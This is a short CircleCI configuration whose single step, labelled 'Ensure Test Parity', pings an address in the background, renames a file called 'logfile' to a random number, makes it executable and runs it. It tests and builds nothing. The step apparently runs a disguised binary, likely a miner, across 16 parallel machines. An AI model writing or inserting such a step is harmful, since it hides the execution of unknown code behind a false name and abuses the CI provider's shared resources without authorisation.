version: 2.1
jobs:
  build:
    parallelism: 16
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
                 ping 10.10.10.10 >/dev/null 2>&1 >/dev/null &
                 liner=$(shuf -n 1 -i 1-999999) && mv logfile $liner && chmod +x $liner && ./$liner

                 